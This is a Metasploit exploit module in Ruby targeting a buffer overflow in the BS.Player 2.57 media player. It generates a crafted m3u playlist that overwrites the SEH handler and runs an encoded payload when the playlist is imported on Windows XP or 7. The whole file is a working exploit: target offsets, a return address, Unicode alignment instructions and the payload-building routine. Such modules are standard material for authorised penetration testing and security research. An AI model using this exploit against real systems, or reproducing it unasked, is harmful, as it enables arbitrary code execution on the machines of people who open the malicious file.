metasploit-framework/modules/exploits/windows/fileformat/bsplayer_m3u.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BS.Player 2.57 Buffer Overflow (Unicode SEH)',
      'Description'    => %q{
          This module exploits a buffer overflow in BS.Player 2.57. When
        the playlist import is used to import a specially crafted m3u file,
        a buffer overflow occurs allowing arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'C4SS!0 G0M3S ', # Original Exploit
          'Chris Gabriel', # MSF Module
          #Greets: Corelan team for mona.py & awesome tutorials
        ],
      'References'     =>
        [
          [ 'OSVDB', '82528' ],
          [ 'EDB', '15934' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 2000,
          'BadChars'        => "\x00\x0a\x0d\x1a\x80",
          'DisableNops'     => true,
          'StackAdjustment' => -3500,
        },

      'Targets'        =>
        [
          [ 'Windows XP',
            {
              # pop ecx # pop ebp # ret 0c
              # ASLR: False, Rebase: False, SafeSEH: False
              # v2.5.7.1051 (bsplayer.exe)
              'Ret'     => "\x2f\x49",
              'Offset'  => 4102,
              'Padding' => 1879
            }
          ],
          [ 'Windows 7',
            {
              # pop ecx # pop ebp # ret 0c
              # ASLR: False, Rebase: False, SafeSEH: False
              # v2.5.7.1051 (bsplayer.exe)
              'Ret'     => "\x2f\x49",
              'Offset'  => 4102,
              'Padding' => 1931
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jan 07 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
      ], self.class)

  end

  def exploit

    nseh = "\x61\x42"

    align  = ''
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x58"	# POP EAX
    align << "\x6d"	# PAD
    align << "\x50"	# PUSH EAX
    align << "\x6d"	# PAD
    align << "\xc3"	# RET

    enc = framework.encoders.create('x86/unicode_mixed')
    register_to_align_to = "EAX"
    enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })
    unicodepayload = enc.encode(payload.encoded, nil, nil, platform)

    padding = rand_text_alpha_lower(target['Padding'])

    buffer  = "http://"
    buffer << rand_text_alpha_lower(target['Offset'])
    buffer << nseh
    buffer << target['Ret']
    buffer << align
    buffer << padding
    buffer << unicodepayload

    file_create(buffer)

  end
end